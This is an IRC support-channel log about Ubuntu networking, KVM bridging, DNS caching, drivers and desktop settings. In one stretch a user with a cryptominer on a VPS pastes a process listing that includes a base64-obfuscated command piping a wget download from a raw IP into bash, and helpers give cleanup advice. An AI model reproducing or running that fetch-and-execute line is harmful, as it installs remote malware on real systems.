ubottuhatter82: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-) See also !patience16:15
SporkWitchi prefer #debian's version:16:17
SporkWitchIf you have a question, just ask! For example: "I have a problem with ___; I'm running Debian version ___. When I try to do ___ I get the following output ___. I expected it to do ___." Don't ask if you can ask, if anyone uses it, or pick one person to ask. We're all volunteers; make it easy for us to help you. If you don't get an answer try a few hours later.16:17
matjamSporkWitch: yeah that's nicer16:18
matjammuch more friendly16:18
SporkWitchalso gives a good idea on HOW to form a question16:19
matjamthough its a lot to read for some :P16:19
SporkWitchif it's too much to read, then they're too lazy to be helped16:19
matjamOMG WORDS you expect me read that many WORDS16:19
BluesKajmatjam, well, debian bots are as pedantic as some of the helpers over there :-)16:20
Battlemoffa: okay so i fixed the lack of 'eth0' interface in bctl show command, however the eht0 interface connectivity is gone again XD16:21
eriofreenode on ipv6 is not working for me16:21
eriois it ubuntu 16.04 and hexchat16:21
eriois it working for you guys ?16:21
matjamerio: yup16:21
matjamerio: does https://test-ipv6.com/ work for you?16:22
erio11/14 tests...16:22
eriomaybe it's my isp16:23
erioI just wondered why freenode was only resolving to ipv6 instead of ipv416:23
erioI manually inputed an ipv4 address16:24
matjamerio: could be router configuration16:24
matjamerio: I know my router I need to reboot it occasionally as it loses ipv6 and doesn't get it back, ha16:25
erioah yes16:27
kiriuhaah yes16:28
erioI have to reboot my router from time to time too16:28
erioI actually didn't do that16:28
moffaBattle what do you mean there is no connectivity? is there is no IP? is dhcp enabled for it or is it static? if dhcp can you run dhcp -v br016:29
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Battlemoffa , it seems eth0 has no IP, br0 does , it has the main server IP16:32
moffayeah, don't worry about eth0 anymore, that bridge will be your ip device16:33
Battleokay good, was wondering that, so that part is normal16:33
Battlebr0 is static16:33
moffaWhen you spin up a vm, you'll get a tap device appear on your host machine16:34
Battleand by no connectivity i mean there's no interent, cant ping google.co.uk for example16:34
moffayou still can't?16:34
Battlenope :(16:34
moffawhat about ping
Battlenetwork unreachable16:35
Battlei guess that rules out resolution issues16:35
moffayou need to setup your routes, gateway etc since you aren't using dhcp16:35
Battleahhh seems br0 is missing gateway16:36
matjamnetwork manager will be out of the loop if you set up br0 in /etc/network/interfaces16:41
matjamalso if you use VPNs, they might not work anymore16:41
transhumanhow do i set a static address that nslookup discovers for a domain name. trying to buypass normal dns lookup of a particular domain in ubuntu 18.04 its like it ignores the host file settings16:42
transhumanI suspect there might be a way in the /etc/dhcp/dhclient.conf but I cant seem to figure out how16:44
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moffaJust add it to /etc/hosts, won't work with nslookup but it will with ping16:46
Battlemoffa http://prntscr.com/jn98ql16:50
Battledoes that all seem normal to you?16:50
transhumannote /etc/nsswitch doesnt exist!16:57
transhumannever mind its name /etc/nsswitch.conf16:58
matjamwhen you use nslookup you are explicitly saying, "use DNS to find this name". But applications use gethostbyname() which will consult /etc/hosts first16:58
transhumanyeah but the browser seems to ignore the host file too16:59
blackflowtranshuman: it's not, it's just (annoyingly) doing its own additional caching.16:59
matjamyou may need to restart the browser17:00
matjamor even the machine, there's layers of caching going on these days17:00
transhumanyeah I have restarted the whole thing and it still resolves to my real domain apache server17:00
matjamwhich browser17:00
blackflowtranshuman: https://ccm.net/faq/555-disabling-the-dns-cache-in-mozilla-firefox17:04
transhumanquestion guys, can I just make a cookies and data exception for the domain so that it never does caching for that particular domain?17:08
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transhumannot sure if thats the function of that optoin17:08
transhumannope that doesnt seem to fix it17:09
transhumannot sure if thats because thats not the problem or not the function of that opton17:09
blackflowwell... WorksForMe(tm).17:10
blackflownote that when you disable the FF's own dns cache, you have to clear it.17:10
blackflowif you still have issues, then the problem is probably on the systemd-resolved side, which is usually the case. I don't do systemd-resolved, probably why I don't have any DNS issues.17:11
tomreyn"systemd-resolve example.org" would tell whether it is aware of the correct resolution17:12
transhumanhey that worked after clearing the cache. Thanks guys17:14
transhumanthey have damn near done their best to make it impossible to diagnose things these days17:15
transhumanlearn something new every day, thanks again17:15
blackflowyeah the FF DNS cache both does make sense and doesn't as it breaks the TTL control of the zone admin. pretty much any OS that FF runs these days does own caching, so the setting is redundant.17:16
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superguestThe removal (apt-get purge mime-support) resulted in the removal of unity in 16.0417:47
superguestDoes that sound strange to anyone?17:47
hggdhsuperguest: if unity depends on mime-support, then it is expected17:48
CookieMI like to use synaptic in these situations because it warns me which additional packages will be removed if I choose one, even tiny or obscure17:51
superguestCookieM, I might have ignored it.17:52
matjamapt would have warned you17:54
tomreynapt-get did, too, for sure.17:55
Battlehonestly dont know why this just refuses to work, i never had so much trouble in all my life with setting this networking things up....17:56
tomreynwhat is "this"?17:56
Battlesetting gateways makes no difference it seems17:56
BattleI'm trying to setup KVM with a bridged network from eth0 to br017:57
Battleunder certain circumstances, things will work, but others will break, and vice versa, for example, i can (if i disable the bridge) get internet access, but cannot bridge naturally, if i enable bridge, i cannot get internet access17:57
matjamdid you enable forwarding in /etc/sysctl.conf17:58
Battleill make sure, ive reinstalled so many times now that i cant remember if ive done that lol17:58
matjamBattle: pastebin your /etc/network/interfaces file17:58
Battle(i managed to get it allw orking perfectly under virtualbox, but this is kinda overkill for what i need...)17:58
Battleone moment, i have to wait for it to finish doing what its doing did another fresh install after the last attempt failed18:00
Battlei dont like having lots of alterations made where things broke and dint work, then more alterations and so on....18:00
Battlefeels.......dirty? XD18:01
Battlewhat i can say is that output of brctl show , displayed br0 linked with eth018:02
Battlewhich is correct as far asi know18:02
Battleifconfig listed br0 with the correct IP address, broadcast18:02
BattleI did notice it had network of, and usually its 224 at the end....but ive also seen on the internet 255 at the end so im not sure if thats important18:03
matjamplease pastebin the file I asked you to share18:03
Battleyeah I said I need to wait for it to finish installing , its reinstalling os after al the failed attempts and installations of various packages....18:04
Battlekinda a 'reset' to start fresh again18:04
Battlei will have to check that /etc/sysctl.conf file too, i dont recall if i did that or not.. ive had so many attempts at this over the last few days lol18:06
matjamit should be a matter of creating the right configuration in /etc/network/interfaces and enabling ip forwarding in /etc/sysctl.conf.18:07
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Battleand thats all? alright, ill give it a go again18:15
Battlewhen its up18:15
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zutatwhere can i put my changes to xorg configuration in 18.04? i need to add stuff into a monitor section.18:23
tomreynprobably the same place as before /etc/X11/xorg.conf - see xorg.conf(5) to verify18:25
ducassezutat: create /etc/X11/xorg.conf.d and put snippets there18:27
takisIs someone willing to join me and build a new distro together as a team ? If yes pm me. Thanks18:28
zutattomreyn, ducasse: thanks18:31
matjamzutat: /etc/X11/xorg.conf will be used if it exists18:35
Battledoes ubuntu usually take so long to install? o.O18:38
tomreynit can take short or long or neither, depending on your environment and measure.18:39
tomreynif you'll discuss your hardware, internet connection, the ubuntu release you're installing, and how you're installing, it may be possible to provide a less generic response.18:40
Battleyeah sorry, the question wasnt really formed well enough to gain a real answer, you're correct18:41
Battlewell, the internet connection is 1gbps, the ubuntu release being installed is ubuntu minimal via a network boot im guessing, hardware is i7 3770, 32gb ram18:42
zutatthe installation time is about the same as on other distros18:42
Battlehmm, maybe mines locked up or something18:42
Battleits been going ages now and no life yet XD18:42
syb0rgBattle, did you click the little arrow so you can see status messages?18:43
zutatok. next question. what's the correct place to set the cpu governor?18:43
Battlesorry its being installed on a dedicated server provided by hetzner18:43
syb0rgah, a server install. Well no arrow for you18:44
Battleyeah :D18:44
syb0rgButterfly^, we all know the world is flat. Too many NASA trolls in here -.-18:48
Butterfly^flat earth trolls you mean? :)18:48
Battleokay yeah it did lock up during install...18:49
Battlei started new install and its done now lol18:49
syb0rgzutat, this isn't something I have messed with, but I guess some people use cpufrequtils?18:49
syb0rgthere we go Battle, that's the good stuff right there, a fresh cup of Ubuntu, yessir18:50
syb0rgBattle, now what are you gonna do with your new server?18:50
Battlenow i must begin the hopefully succesful task of installing KVM and bridging the eth0 to br0 to allow independant containers for the addtional ips i have18:51
syb0rgcool, are you gonna do some kind of shared hosting thing?18:51
Battleso far, this seemingly simple task, has been an impossible task, for the last 3 or so days18:51
syb0rgno, networking and vms are tricky18:52
Battlewell, we need at least one container for our own servers that we host18:52
zutatsyb0rg: yes, some slightly older web pages suggest using cpufrequtils, which is still available, but doesn't seem to (re)set the governor after suspend/resume. after a normal boot, it works18:52
chris11I'm running lubuntu and am having trouble getting into grub, I've tried holding shift, but that hasn't been successful. Is there a commandline command that will reboot into grub?18:52
Battlebut i will be looking into hosting if possible :D18:52
rqofohousesWhy ? https://paste.ubuntu.com/p/bGhXNsGJsW/18:52
Battlemost likely just for our community members, nothing too heavy..18:52
syb0rgzutat, that is annoying. You could probably write a script that runs every minute with cron and ensures you have the correct settings though18:52
syb0rgor find a better util *shrug*18:53
kiokomansudo update-rc.d ondemand disable18:53
matjamchris11: increase the timeout in /etc/default/grub and run update-grub18:53
chris11ok, thanks. Is there an actual command to just boot into grub though?18:54
jvw1Hi guys18:55
jvw1I'm in a bit of a pickle; I have a setup that includes Ubuntu 17.10 (MATE) and a GTX1050 connected to a monitor with a DisplayPort cable.18:56
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jvw1Naturally, I want to upgrade to 18.04, but just before I started that process, I luckily had the bright idea to read the release notes.18:57
EriC^^chris11: is it in a vm?18:57
jvw1That is when I stumbled upon "Systems may fail to boot when connected over DisplayPort to an external screen, on NVidia graphics hardware such as the GTX970 chipset. " (https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1723619)18:58
ubottuLaunchpad bug 1723619 in Linux "Ubuntu Desktop ISO fails to boot with nouveau on a displayport" [Medium,Confirmed]18:58
jvw1it seems like a relatively old bug and not much progress seems to have been made18:58
syb0rgwow, I have a gtx970 with Nouveau. Good thing I use HDMI....18:59
jvw1So to me it seems I have 3 choices: wait for 18.04.1 and  hope that it is suddenly fixed in that period (while it has not been fixed in the previous 6 months), waste money on an HDMI cable, or downgrade to 16.04 LTS.19:00
jvw1because 17.10 will be EOL in July already!19:00
jvw1I keep being surprised about that because I feel like Ubuntu releases used to have much longer support19:01
syb0rgjvw1 is your screen a 4k?19:01
jvw1it's just a regular 1080p19:01
syb0rgjvw1 this bug specifically refers to 4k over displayport19:01
syb0rgI would try booting to the 18.04 live environment with your monitor attached on displayport19:01
syb0rgand if it works, you're probably golden19:01
syb0rgalso, regarding support: *.10 editions get like a year of support. *.04 versions are LTS, and get five years19:02
syb0rgso 18.04 is support through 2023 =P19:02
jvw1I know, but I think it used to 2 years for *.10 versions, right?19:02
syb0rgmaybe, I dunno19:02
ducasseno, <even number>.04 is lts19:02
DJonessyb0rg: Not quite, LTS comes out every 2 years19:03
jvw1I think it does extend to 1080p BTW19:03
syb0rgok, sure, wasn't aware there were non-even number .04s19:03
ducasse<odd number>.04 are regular releases, 9 months support19:03
syb0rgok, got it19:03
jvw1"Today's 18.04 upgrade from 17.10, using 4k or 1080 monitor with display port or with HDMI for Radeon RX 460 booting until bios,then screen flashing with jumbled colors every few seconds, shutdown displays Ubuntu logo."19:03
jvw1I'm not sure; it all is pretty vague to me TBH, but I really don't feel like being stuck with a non-booting system19:04
syb0rgjvw1, that is a different bug entirely.19:04
syb0rgjvw1, I can understand that. There is always some risk in updating19:04
jvw1You think it is RX460 specific?19:04
syb0rgwell I think the second bug you mentioned is different hardware entirely, with different drivers19:05
syb0rgI don't know if it is RX460 specific or not19:05
jvw1to be honest I don't even remember if I'm running Nouveau or Nvidia proprietary19:05
jvw1is it possible to run the closed source Nvidia driver exclusively?19:06
jvw1Or will it always use Nouveau at some point (like at boot time)?19:06
syb0rgas far as I know, at boot it doesn't use either nouveau or nvidia drivers, just more basic low level APIs19:07
syb0rgif you have a problem with Nouveau, you should be fine to switch to Nvidia19:07
jvw1I do have the Nvidia X Server settings app installed, so I'm guessing I'm running the blob19:07
syb0rgif you want to know what you are running, try: lsmod | grep nouveau19:07
jvw1unless it doesn't boot anymore ;)19:07
syb0rgand lsmod | grep nvidia19:08
jvw1doesn't list nouveau, so the blob it is I guess19:08
jvw1yep, it does list nvidia_drm and a bunch of other stuff19:08
syb0rgwell there ya go19:09
jvw1it's tagged nouveau, so I'm guessing it's nouveau specific19:09
syb0rgthe initial bug you showed? Looks like it19:09
jvw1Anyway, I guess I could always do a backup, attempt to upgrade to 18.04 LTS, and if it doesn't boot anymore I could just do a clean 16.04 LTS install19:10
jvw1I know I should be doing a backup anyway before upgrading ;)19:10
jvw1It's kind of a stupid story how I came to be stuck with DP anyway19:11
syb0rgbackups are always good, yes19:11
jvw1My desktop is pretty old, so the built-in GC doesn't even have HDMI19:11
syb0rgand if you run into trouble doing an upgrade, I would try a clean install of 18.04 before defaulting back to 16.0419:11
jvw1It's second hand and arrived before my GTX1050 did19:11
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jvw1so then I realized that if I wanted get started with the setup, I would need to buy a DP cable since I didn't have any of those lying around19:12
jvw1of course the GTX1050 *does* have HDMI, so it turned out to be kind of pointless in the end19:12
syb0rgand also a route to fix your problem if it won't boot on DP (get an HDMI cable)19:13
syb0rgassuming your monitor has HDMI19:13
jvw1yeah, it does19:13
jvw1it's just that I used to used this monitor with a macbook air, so I had a thunderbolt <-> hdmi cable for that19:13
jvw1I guess I should do the backup then... Time to go and look for that missing USB cable for my external HDD...19:15
jvw1Wasn't really planning on doing it right now because I was already working on repairing my little home server19:17
jvw1somehow the passwords in my password manager aren't working though, so that's a bit frustrating19:17
syb0rgwell if you get the server working first you can just use ssh to back up to it, no USB cables required19:17
syb0rghurray for efficiency19:17
jvw1I've tried dozens of variations as well. I'm almost starting to think it was attacked by those Russian hackers ;)19:17
syb0rgthose dem Russians19:18
jvw1But I assume it is not an easy enough target19:18
jvw1since it is relatively up-to-date19:18
jvw1there must be tons of much more interesting targets still running Debian 6 or 719:18
jvw1without any security updates19:18
syb0rgprobably so19:19
jvw1My home server doesn't really have any storage though, so I fear your plan won't work19:19
syb0rghmmmmmmmmm, some server ya got there19:19
jvw1the only thing it does is run my now defunct personal website from a 16 GB USB stick19:19
syb0rgservers should have terabytes for days19:19
syb0rglol nice19:20
jvw1it's a Wandboard SBC, so the OS is installed on a 16GB microSD19:20
jvw1and I'm using the USB drive to avoid wearing down that SD card too much19:21
jvw1I guess that it is pointless anyway what with all the OS logs and everything19:21
syb0rghuh, never heard of wandboard19:21
jvw1it's like an RPi on steroids19:21
jvw1I bought it before the RPi 2 and 3 were a thing19:21
syb0rgI'm on their homepage now, this is the first time I have ever seen "secure" and "IoT" used in the same sentence unironically19:22
syb0rgthat's a mighty tall order19:22
jvw1it's a dual core19:22
jvw1I think it has either 512 mb or 1 GB of RAM19:22
jvw1and an i.MX619:22
jvw1software support is decent19:22
jvw1I'm running a kernel made by some guy working for Digikey19:23
jvw1so that seems ok19:23
syb0rgit looks quite comparable to an rPi honestly19:23
jvw1I know, but at the time rPi kind of sucked specs wise19:23
jvw1and I didn't want to get stuck with ARMv619:23
jvw1this was easily available to me (I was still living in Europe back then) and affordable19:24
syb0rglol! I have never seen a board that small with VGA19:24
syb0rglooks super out of place19:24
jvw1yep, it is pretty nice19:24
jvw1even has WiFi and BT, not that I'm using that19:25
syb0rgyeah, I see it has AC19:25
syb0rgit amazes me how every low end device has AC now19:25
jvw1yep and mine is like 3 years old, I guess19:25
jvw1I think I bought it from Mouser19:26
jvw1possible Digikey19:26
syb0rgYa know I have a raspberry pi, I have never had an actual use for it though19:26
jvw1it did come from a US warehouse though, I believe19:26
syb0rgjust booted into raspbian and went, "cool," then turned it back off and put it in a dusty corner19:26
jvw1honestly this seemed cheaper than renting a shared server19:26
jvw1and everything else was just bonus19:27
syb0rgI also have an Arduino, and have done equally little with it19:27
jvw1I can always mess around with it if I want to19:27
jvw1yep, somehow I keep buying electronics stufrf19:27
syb0rgI programmed the onboard LED to blink messages in morse code, then it joined the raspberry pi in the corner19:27
jvw1even though I have never completed a serious project19:27
syb0rglol I know the feeling. All the projects I end up doing are on my pc anyway, but I have all these boards and parts19:28
jvw1It's just much easier19:28
syb0rgand typically more useful19:28
jvw1for a while I thought I was going to major in CompEng19:28
syb0rgI currently am :-)19:28
jvw1but now I've decided to go with CompSci anyway19:28
syb0rgalso a good major19:29
syb0rgI switched in the opposite direction though19:29
jvw1I never really switched19:29
jvw1because I still attending a community college19:29
syb0rgyup me too19:29
jvw1it's more like mentally19:29
syb0rgstop having so much in common with me =P19:29
jvw1the thing is19:30
jvw1I think CompEng would get really old after a while19:30
syb0rghow so?19:30
jvw1working with all those outdated tools without a proper debugger19:31
jvw1I think I would really start to hate it after a while19:31
syb0rgEh, I don't mind C too much19:31
jvw1even if it is interesting at first19:31
syb0rgmanaging memory is a little annoying though, and I hate the lack of real strings19:31
jvw1I imagine I would be able to put up with everything for some time19:31
jvw1but I feel like in the end all the little irritations would add up19:32
jvw1and CompEng would also involve electronics of course19:32
syb0rgquite a bit19:32
jvw1and that is even worse because you can't just recompile as easily19:32
syb0rgit's basically electrical engineering + code19:32
jvw1debugging a circuit seems like a nightmare to me19:32
syb0rgI'm procrastinating on a circuit design take home exam right now actually19:33
jvw1especially because if it gets really complicated; you start to have all these indirect, physical effects19:33
jvw1like electromagnetic radiation19:33
syb0rgvery true, circuits are tricky19:33
jvw1that is going to mess things up19:33
xmetalwas getting into ECA stuff (studying) and then i have just been so sidetracked and didn't go back ... have been meaning to19:33
jvw1create noise somewhere else19:33
jvw1I don't know the specifics19:33
jvw1but I have heard it can get really nasty19:34
Flannelsyb0rg, jvw1: Hi. Can you guys move this conversation to #ubuntu-offtopic? thanks.19:34
jvw1looks like I need to register first...19:34
syb0rghonestly I should go do stuff anyway19:35
syb0rggood chat jvw119:35
jvw1yep for sure19:35
jvw1good luck!19:35
MutterHi guys, is there any way i can disable wget as a simple user? Just for my user19:44
tomreynMutter: that's an unusual need, can you discuss why youneed this?19:48
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MutterYeah, i got an annoing miner that i dont know how it ended there. It does a base64 command to decript an address and executes a wget from an ip. I need to block eighter the wget command or that specific ip19:49
* tomreyn needs to go, sorry, hopesomeone else can assist19:50
Mutter47067 ?        S      0:00 sh -c echo -n 'd2dldCAtcSAtTyAtIGh0dHA6Ly8yMDQuNDguMjQuNzIvaW5kZXguaHRtbCB8IGJhc2g=' | base64 -d | bash19:50
Mutter47070 ?        S      0:00 bash19:50
Mutter47072 ?        S      0:00 bash19:50
Mutter47088 ?        S      0:00 wget -O ./0amdpE5K19:50
MutterIt’s not in crontab but it keeps on starting sometime after i kill it19:51
Mutter15134 ?        Ssl    0:03 []19:52
Mutter15160 ?        S      0:00 ./5DiaEd75 ./bNlMGMON19:52
Mutter15162 ?        S      0:00 ./5DiaEd75 ./bnkI202h19:52
Mutter15183 ?        S      0:00 sleep 519:52
Mutter15184 ?        S      0:00 sleep 519:52
CheetahPixieI am still having the second display issue.19:57
CheetahPixieEarlier is on 4.17-rc1. The exact same thing happens on anywhere from 4.15 and up.19:57
CheetahPixieThe latter is on
CheetahPixieAny clue?19:57
CheetahPixieI'm also getting incorrect PCI header signatures or whatever on stuff that's above 4.14.20:02
oerheksmaybe what videocard, what driver version helps.. but with a custom kernel from mainline comes with no official support20:02
oerhekscheck bios updates too ?20:02
CheetahPixieNewest amdgpu, RX480.20:03
CheetahPixieEven official Ubuntu kernels are broken.20:04
oerheksheh... "broken" or your hardware is too new :-D20:04
CheetahPixieWhy then did this work in 4.14 and not above?20:05
CheetahPixieI am on 4.14 now and have both monitors on.20:05
CheetahPixieAnything ABOVE 4.14 does not work.20:05
CheetahPixieAnd this is a mainline, not official Ubuntu kernel.20:05
CheetahPixieSo Mainline DOES have support for it.20:06
CheetahPixie(Or, should.)20:06
CheetahPixiehttps://www.phoronix.com/forums/forum/linux-graphics-x-org-drivers/open-source-amd-linux/45819-radeon-0000-01-00-0-invalid-rom-contents And, according to this, the invalid ROM message has nothing to do with it.20:06
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phil42do we know which kernel 18.04.1 will use?20:07
CheetahPixieAnd I know for a fact that proper support for Polaris 10 was added in 4.8.20:07
CheetahPixieI had to deal with its absence on an older kernel back then.20:08
CheetahPixieoerheks Any other ideas?20:08
oerheksnope, i was not aware that it worked under 4.14 .. card should be supported, https://support.amd.com/en-us/kb-articles/Pages/Radeon-Software-for-Linux-Release-Notes.aspx20:09
oerheksmaybe worth a bugreport??20:09
CheetahPixieI literally said that right after I posted the screenshot.20:11
CheetahPixieAnd I am using amdgpu, not amdgpu-pro.20:12
CheetahPixie(Which are FOSS drivers included in the repos, much like nouveau, but actually functional.)20:12
Battledoes this look perfectly normal to create a bridge for br0 into eth0 https://pastebin.com/JafPHXvA20:12
Battle(personally it seems odd that the guide said to remove all references of eth0 originally in the file, but i know that br0 would become the main one so perhaps its normal...?)20:13
moffaBattle You should add your up route command to the bridge as well20:16
moffaBattle and your ipv6 configuration if you want it as well20:16
BattleI wasnt sure if the ipv6 would interfere/break the bridge so left that out20:16
Battleso if i uncommented that but replaced eth0 with br0 it would be okay?20:17
tomreynMutter: you have a compromise and are analyzing this while it's live?20:17
MutterTo be honest i think that i am the idiot that downloaded that script...the problem is that i cant get rid of it20:18
Battlemoffa okay thanks, and when you say about the up command, should I copy that whole up line of text and just replace eth0 with br0 ?20:18
compdocBattle, this works for me   https://pastebin.com/RHSbPjy320:18
moffachange your dev at the end to the command to  as well br020:18
compdocoops, got the names wrong - both should be br020:19
Battleso it should be like this: up route add -net netmask gw br0 br020:19
Battlecompdoc thank you, i notice yours has no up command, what exactly is this up command?20:20
tomreynMutter: if you don't control it and it has the ability to execute arbitrary code on your system, then it's compromised and needs to be cleaned. doing that while a malware is live is a bad idea. power off the system (hard), take an image of it if you want to analyze it later, and reinstall the system and restore backups (carefully reviewed, unless you know for a fact that the initial compromise took place after the backups were taken).20:21
moffaso it should be like this: up route add -net netmask gw dev br020:21
Battleahhhh okay thanks20:22
Battlemoment of truth.... the restart command!20:22
compdocbattle you wont need any up commands in you use ubuntu 14.04 or newer. my paste is the file: /etc/network/interfaces20:22
MutterCrap...got disconnected20:22
compdoc*if you20:22
Battleoh right, im running ubuntu 1620:23
Battle16.04 to be exact20:23
Battleill try with it and without if it doesnt work but if it works ill leave it alone because ive been battling this for long enough XD20:23
moffathe up route add command adds a static route20:23
compdocI never mess with up down commands. no need. I also dont use network-manager on my kvm servers20:23
BattleFailed to restart network.service: Unit network.service not found.20:24
Battleis it networkbingb ?20:24
tomreynMutter: if you don't control it and it has the ability to execute arbitrary code on your system, then it's compromised and needs to be cleaned. doing that while a malware is live is a bad idea. power off the system (hard), take an image of it if you want to analyze it later, and reinstall the system and restore backups (carefully reviewed, unless you know for a fact that the initial compromise took place after the backups were taken).20:24
Battleis it networking ?20:24
Battlesome guide say network, others networking... but i wanna make sure i do the right thing :S20:25
moffasystemctl status networking -- see what the error sas20:25
Battleoh it restarted network now, and i lost ssh acecss :(20:27
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Muttertomreyn:  i think i downloaded that thing and executed it....the problem is that it’s a vps for witch i dont have root privileges. I was thinking of disabling wget for my user or banning that ip until i can contact the admin20:27
Battletime to activate rescue mode again20:28
moffaGive it a sec to come back online20:28
tomreynMutter: better contact the admin right now and see what you can do to contain it later.20:29
moffaSorry gotta run - hope you figure it out20:29
Muttertomreyn: i cant get hold of him...he didnt reply to my messages so far....maybe he’s out or something20:30
Battleyeah its definately not coming back on20:30
tomreynMutter: you can: alias wget=/bin/true20:30
tomreynMutter: also consider contacting the company hosting it then. they won't usually delete any data, just require hi9m to clean it up properly.20:31
MutterThat will stop wget command until the admin will reply?20:31
tomreynMutter: for your user, it should.20:32
MutterI’ll try it20:32
tomreynBattle: note there is also #hetzner here on freenode where you may get assistence specific to them.20:34
Battleyeah it tried there last night, never got any response and i was there the whole day XD20:35
Battlealso, systemctl status networking produces: http://prntscr.com/jnbyzj20:35
ghost__Hello chat20:35
tomreynBattle: if this is a dedicated server, consider requesting a LARA remote console from them (free for 2 hours), which enables to you to fix networking stuff without having to reboot into emergency.20:36
tomreynit's a networked keyboard, video, mouse (KVM)20:36
Battleim currently inside a vKVM20:37
Battleso i have access to the server to fix the networking , is this the same as what you suggested?20:37
Battleor is it better to use the lara one?20:38
Battleso this confirms the brige is setup correctly, doesnt it?20:38
Battlebecause its linked to eth020:38
Battleso only thing i can think of is the ips inside the interface file....but these are exactly as eth0 prior to my changes ><20:39
ghost__I would like to see if anyone has a write-up or video they would like to post here https://www.hublinux.com/20:56
Battledevice eth0 is already a member of a bridge; can't enslave it to bridge br021:11
greatgatsbyHello.  I'm trying to find "netplan" info in the official Ubuntu 18.04 server documentation.  The docs seems to still refer to /etc/network/interfaces.  Are there official Ubuntu docs on netplan for Ubuntu server?21:12
aroonianyway to install libcurl3 for 18.04 without breaking *everything* ?21:12
nnamehey. /home/user/Templates <-- this is the nautilus templates folder. can I create a file like "notes.txt" in here, and somehow have it created with a timestamp as its content, or in its name such as notes-$(date).txt, etc.?21:18
memphistonname: use CLI; go to folder and touch notes-$(date +"%Y-%m-%d_%H-%M-%S")21:22
memphistolive on the edge21:23
nnamememphisto, thanks, though i was looking for a nautilus solution.21:24
memphistodon't think GUI filemanagers are that versatile21:25
tomreyngreatgatsby: you're right, looks like the server documentation wasn't updated, it still discusses configurations using ifconfig. there is the netplan(5) man page as well as https://netplan.io/21:28
tomreyni also think i heard that improved documentation is in the works, but don't know the details.21:28
nnamesomeone on the ubuntu channel suggested nautilus-actions, that seems to add a button to the context menu and run your command, so that works. i will probably end up just using the terminal though21:28
greatgatsbytomreyn: thanks a lot for confirming.21:29
bosphus2what files are needed to make a clean install like an existing one (aside from media)...just .config?21:30
aroonihow to get unicode smileys on ubuntu 18.04?21:32
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sweateredHiya! How does one 'calibrate' (adjust gamma/RGB sliders) on Ubuntu. The calibration option is for people with calibration devices, but for mere mortals how can it be done? Thanks:)22:02
HanumaanI use mendeleydesktop tool, it is consistantly concuming CPU to 100% how to stop this or only mendeleydesktop can rectify this? and I don't think this is from the tool provider because it is consuming CPU even if I use an older version. also latest version worked till yesterday fine.22:06
aroonihow do i get color emojis on ubuntu22:10
arooni18.04 ?  they're supposed to be 'out of the box'  they are not :(22:10
thewaspskneesCan you see the emoji here? https://en.wikipedia.org/wiki/Emoji22:20
thewaspskneesIf not try installinf ttf-ancient-fonts 'sudo apt install ttf-ancient-fonts'22:20
RoadRunnerhow to turn off accountsservice from cli?22:23
thewaspskneesRoadRunner: https://askubuntu.com/questions/685193/what-starts-accounts-daemon22:26
transhumanhi! I am having an issue with apache2 its rewriting my http requests for a domain to https: but my sites-enabled port 80 configuration shows no ssl setup22:41
transhumanerr. .. no redirects for https22:41
transhumanholy crap I guess I have to learn to read better its rewriting it the last line of the configuration file22:42
aroonianyway on ubuntu 18.04 to make the mouse scroll *SLOWER* ?22:52
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Two_Dogsarooni: the scroll setting for mouse has some options, tried any? natural scroll help?22:58
arooniTwo_Dogs: it just switches the direction of the scroll22:59
arooniit scrolls nearly an entire page for each 'click' currently22:59
aroonijust posted https://stackoverflow.com/questions/50557251/anyway-to-slow-down-speed-of-wireless-mouse-middle-button-scrolling-on-18-0422:59
Two_Dogsarooni: you familiar with the tweaks tool?23:01
arooniTwo_Dogs: yup got it installed23:01
Two_Dogsarooni: no joy either?23:02
aroonii can adjust the accelration profiel.; but i think thats w/r/t how the mouse moves23:05
arooninot what happens with the scroll wheel23:05
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luketheduke1My stupid laptop has a button that closes a window right by refresh button. Is there a way I could stop ubuntu from responding to that keypress?23:24
Two_Dogsluketheduke1: probably not23:44
Two_Dogsput a sticky note on it23:45
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realiesive trained a neural net on matlab and wonder if i can use it on the pi?23:52
realieswoops wrong channel23:52
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